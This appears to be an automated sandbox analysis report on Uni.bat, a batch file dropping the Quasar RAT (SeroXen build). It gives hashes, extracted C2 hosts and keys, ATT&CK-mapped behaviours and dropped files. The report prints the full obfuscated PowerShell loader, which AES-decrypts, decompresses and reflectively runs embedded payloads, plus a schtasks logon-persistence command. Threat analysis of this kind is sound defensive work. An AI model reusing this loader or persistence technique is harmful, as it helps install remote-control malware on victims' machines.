Analysis
-
max time kernel
143s -
max time network
155s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
-
submitted
30-05-2024 10:22
General
-
Target
Uni.bat
-
Size
511KB
-
MD5
9fb9372aca1d8d842589419264c8ae62
-
SHA1
9313414673f343c9bb14939c6c14697dcdfc1aa0
-
SHA256
38defd519e3b007e7590a2dc8101f356806b1f1cdcdba3eccfa0afc46b2f8577
-
SHA512
10b935a27946dd4e4ff22b42782e141d22471f90fe086c6874e783a341066f0b54be8fdcbc7c7df21d96565ed0d7b00afd91bd59ac8c37613579decb0fb84618
-
SSDEEP
12288:/JXwTLWKJYuv1T5jgKND/v+Tz5Wgv2qwAbMdusp/cq:/JKj5jgKdW5WgOqwAYxh
Malware Config
Extracted
quasar
3.1.5
SeroXen
panel-slave.gl.at.ply.gg:57059
panel-slave.gl.at.ply.gg:27892
$Sxr-rpL8EItHN3pqIQQVy2
-
encryption_key
PXEHWy52mqnqS2Hd39SK
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
SeroXen
-
subdirectory
SubDir
Signatures
-
Quasar RAT
Quasar is an open source Remote Access Tool.
-
Quasar payload 1 IoCs
-
Blocklisted process makes network request 2 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Executes dropped EXE 1 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of WriteProcessMemory 9 IoCs
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1tEGKi4VytwOkTEJ8mQKeyciBUGLe1meEjQfMLUYBak='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7rtamVIQAKNy+6k+WiT3+Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ukQvk=New-Object System.IO.MemoryStream(,$param_var); $BXroT=New-Object System.IO.MemoryStream; $hmuUD=New-Object System.IO.Compression.GZipStream($ukQvk, [IO.Compression.CompressionMode]::Decompress); $hmuUD.CopyTo($BXroT); $hmuUD.Dispose(); $ukQvk.Dispose(); $BXroT.Dispose(); $BXroT.ToArray();}function execute_function($param_var,$param2_var){ $ZKofb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $shval=$ZKofb.EntryPoint; $shval.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$imIdF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($mdSzT in $imIdF) { if ($mdSzT.StartsWith(':: ')) { $Ijxic=$mdSzT.Substring(3); break; }}$payloads_var=[string[]]$Ijxic.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exe"schtasks" /create /tn "SeroXen" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f3⤵
- Creates scheduled task(s)
-
-
C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"C:\Users\Admin\AppData\Roaming\SubDir\Client.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4460 --field-trial-handle=2692,i,8678872182442199182,12502579059484928042,262144 --variations-seed-version /prefetch:81⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
423KB
MD5c32ca4acfcc635ec1ea6ed8a34df5fac
SHA1f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919
SHA25673a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70
SHA5126e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
472KB
-
Filesize
7.7MB
-
Filesize
272KB
-
Filesize
7.7MB
-
Filesize
216KB
-
Filesize
7.7MB
-
Filesize
304KB
-
Filesize
6.5MB
-
Filesize
104KB
-
Filesize
72KB
-
Filesize
392KB
-
Filesize
432KB
-
Filesize
7.7MB
-
Filesize
7.7MB
-
Filesize
32KB
-
Filesize
240KB
-
Filesize
4KB
-
Filesize
120KB
-
Filesize
7.7MB
-
Filesize
4KB
-
Filesize
3.3MB
-
Filesize
7.7MB
-
Filesize
584KB
-
Filesize
7.7MB
-
Filesize
408KB
-
Filesize
408KB
-
Filesize
136KB
-
Filesize
5.6MB
-
Filesize
6.2MB